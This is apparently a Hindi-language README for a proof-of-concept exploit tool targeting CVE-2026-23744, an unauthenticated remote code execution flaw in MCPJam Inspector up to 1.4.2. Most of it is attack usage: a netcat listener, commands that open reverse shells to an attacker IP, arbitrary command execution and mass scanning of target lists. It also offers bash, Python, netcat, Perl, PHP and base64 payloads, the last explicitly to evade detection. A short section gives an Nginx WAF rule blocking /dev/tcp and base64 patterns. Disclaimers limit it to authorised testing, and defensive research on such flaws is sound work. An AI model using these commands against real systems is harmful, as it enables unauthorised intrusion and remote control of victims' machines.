
CVE-2026-23744 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट - MCPJam इंस्पेक्टर रिमोट कोड निष्पादन (RCE) भेद्यता। यह टूल संस्करण <=1.4.2 में सुरक्षा दोष प्रदर्शित करता है और सुरक्षा शोधकर्ताओं को पैच सत्यापित करने में मदद करता है। केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए। इसमें कई पेलोड विकल्प, कमांड निष्पादन और सत्र प्रबंधन शामिल हैं।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है। उपयोगकर्ता अपने कार्यों की पूरी जिम्मेदारी लेते हैं।
इस रिपॉजिटरी में CVE-2026-23744 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो MCPJam Inspector संस्करण <=1.4.2 में पाई गई एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी है। इस कमजोरी का CVSS स्कोर 9.8 (क्रिटिकल) है, जो नेटवर्क अटैक वेक्टर के साथ गंभीर जोखिम दर्शाता है।
| विशेषता | विवरण |
|---|
| CVE ID | CVE-2026-23744 |
| कमजोरी | बिना प्रमाणीकरण के रिमोट कोड निष्पादन |
| प्रभावित संस्करण | <=1.4.2 |
| CVSS स्कोर | 9.8 (क्रिटिकल) |
| हमला वेक्टर | नेटवर्क |

एक्सप्लॉइट टूल सेट अप करने के लिए, इन चरणों का पालन करें:
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
डिपेंडेंसी इंस्टॉल करें:
pip install -r requirements.txt
बेसिक एक्सप्लॉइट शुरू करने के लिए, पहले एक लिसनर सेट करें, फिर एक्सप्लॉइट स्क्रिप्ट चलाएं:
# Start listener
nc -lvnp 4444
# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
एकल कमांड या फाइल से कमांड निष्पादित करें:
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
विभिन्न परिदृश्यों के लिए विभिन्न पेलोड प्रकारों का उपयोग करें:
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
कमजोरी के लिए कई लक्ष्यों को स्कैन करें:
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
फिंगरप्रिंटिंग, प्रॉक्सी उपयोग, वर्बोज़ मोड, और ऑटो-लिसनर सेटअप जैसी उन्नत कार्यक्षमताओं का अन्वेषण करें:
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
| प्रकार | कमांड | सर्वोत्तम उपयोग |
|---|---|---|
bash | Bash reverse shell | अधिकांश Linux सिस्टम |
python | Python3 reverse shell | Python इंस्टॉल सिस्टम |
nc | Netcat reverse shell | Netcat वाले सिस्टम |
perl | Perl reverse shell | Perl इंस्टॉल सिस्टम |
php | PHP reverse shell | PHP इंस्टॉल सिस्टम |
base64 | Base64 encoded | पता लगाने से बचना |
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
CVE-2026-23744 से बचाव के लिए निम्नलिखित तत्काल कार्रवाई करना महत्वपूर्ण है:
/api/mcp/connect पर संदिग्ध POST अनुरोधों की निगरानी करें।सामान्य दुर्भावनापूर्ण पैटर्न को ब्लॉक करने के लिए उदाहरण Nginx WAF नियम:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
प्रश्न: क्या इसका उपयोग कानूनी है?
उत्तर: यह उपकरण केवल उन सिस्टम पर उपयोग करना कानूनी है जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट लिखित अनुमति है।
प्रश्न: कौन से सिस्टम कमजोर हैं?
उत्तर: MCPJam Inspector संस्करण <=1.4.2 कमजोर हैं।
प्रश्न: मैं अपने सिस्टम की सुरक्षा कैसे कर सकता हूं?
उत्तर: तुरंत MCPJam Inspector संस्करण >1.4.2 में अपग्रेड करें।
Sudeepa Wanigarathna
इस उपकरण का अनधिकृत उपयोग अवैध है और इसके गंभीर परिणाम हो सकते हैं, जिनमें शामिल हैं:
❤️ के साथ बनाया गया Sudeepa Wanigarathna द्वारा